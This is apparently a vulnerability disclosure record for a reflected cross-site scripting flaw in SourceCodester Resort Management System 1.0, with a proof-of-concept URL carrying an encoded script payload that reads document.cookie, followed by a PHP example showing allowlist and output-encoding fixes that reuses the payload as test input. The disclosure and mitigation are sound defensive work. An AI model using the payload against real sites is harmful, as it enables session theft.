| Title | Authenticated Reflected Cross-site scripting vulnerability in resort management system via page parameter |
|---|
| Description | ### Summary:
It was discovered that SourceCodester's Resort Management System v1.0 is vulnerable to an authenticated reflected cross-site scripting vulnerability via the page parameter. An attacker can launch the attack remotely.
CVSS 3.1 Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
### POC:
1. Go to http://localhost/php-sqlite-rrs/login.php and authenticate yourself with your credentials.
2. Then go to http://localhost/php-sqlite-rrs/?page=update_accountsfrut%3c%2ftitle%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3etkckj
|
|---|
| User | kr1shna4garwal (UID 49100) |
|---|
| Submission | 06/19/2023 08:15 (3 years ago) |
|---|
| Moderation | 06/19/2023 13:58 (6 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 231937 [SourceCodester Resort Management System 1.0 page cross site scripting] |
|---|
| Points | 17 |
|---|
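
One way to close the reflection shown in the POC above, as an added example that is not code from Resort Management System or from the submitter. It assumes the application routes on `?page=<name>` and echoes that name inside `<title>` (inferred from the `</title>` in the POC value); `ALLOWED_PAGES`, `resolve_page`, `e`, `render_title` and the `home` page name are hypothetical.

```php
<?php
// Added example, not the application's own code. Assumption: ?page=<name>
// selects a view and the name is echoed inside <title>.

// Hypothetical allowlist; only update_accounts appears in the POC URL.
const ALLOWED_PAGES = ['home', 'update_accounts'];

function resolve_page(?string $raw): string
{
    // Accept only exact, known page names; anything else falls back to a default.
    if ($raw !== null && in_array($raw, ALLOWED_PAGES, true)) {
        return $raw;
    }
    return 'home';
}

function e(string $value): string
{
    // Encode for HTML text and quoted-attribute contexts.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_title(string $page): string
{
    // Encode on output even though the value already passed the allowlist.
    return '<title>' . e(ucwords(str_replace('_', ' ', $page))) . '</title>';
}

// Constructed input: the percent-decoded page value from step 2 of the POC.
$poc = 'update_accountsfrut</title><script>alert(document.cookie)</script>tkckj';

// Assumed vulnerable pattern: raw reflection lets </title> close the element early.
$vulnerable = '<title>' . $poc . '</title>';

// Hardened: the allowlist rejects the value and the default page is rendered.
$safe = render_title(resolve_page($poc));

// Encoding alone, for views that must echo user input: markup becomes inert text.
$encoded_only = '<title>' . e($poc) . '</title>';

foreach (['vulnerable' => $vulnerable, 'safe' => $safe, 'encoded_only' => $encoded_only] as $name => $html) {
    $live = strpos($html, '<script>') !== false ? 'yes' : 'no';
    echo $name . ': live script tag = ' . $live . PHP_EOL;
    echo '  ' . $html . PHP_EOL;
}
```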